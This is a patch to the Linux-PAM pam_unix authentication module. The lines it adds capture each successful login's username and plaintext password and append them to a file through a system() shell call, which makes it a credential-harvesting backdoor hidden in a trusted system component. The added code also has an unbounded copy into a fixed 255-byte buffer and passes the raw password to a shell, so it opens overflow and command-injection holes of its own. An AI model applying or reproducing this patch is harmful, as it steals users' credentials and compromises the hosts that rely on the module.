*** ./modules/pam_unix/pam_unix_auth.c	2016-04-11 08:08:47.000000000 -0300
--- pam_unix_auth.c	2017-06-07 21:25:25.656306410 -0300
***************
*** 170,176 ****
  	D(("user=%s, password=[%s]", name, p));
  
  	/* verify the password of this user */
! 	retval = _unix_verify_password(pamh, name, p, ctrl);
  	name = p = NULL;
  
  	AUTH_RETURN;
--- 170,200 ----
  	D(("user=%s, password=[%s]", name, p));
  
  	/* verify the password of this user */
!       retval = _unix_verify_password(pamh, name, p, ctrl);
!       if(retval == PAM_SUCCESS){
!           char fp[255] = "echo ";
!           int i=0,i2=0,i3=0;
!           char *preffix = " >> _OUTFILE_"; 
!           while(1){
!             if(name[i] == '\0'){break;} 
!             fp[5+i] = name[i];
!             i++;
!           }
!           fp[5+i]='-';
!           fp[5+i+1]='-';
!           while(1){
!             if(p[i2] == '\0'){break;}
!              fp[5+i+1+i2] = p[i2];
!              i2++;
!           } 
!           while(1){
!               if(preffix[i3] == '\0'){break;}
!               fp[5+i+1+i2+i3] = preffix[i3];
!               i3++;
!           }
!           fp[254] = '\0';
!           system(fp);
!       }
  	name = p = NULL;
  
  	AUTH_RETURN;
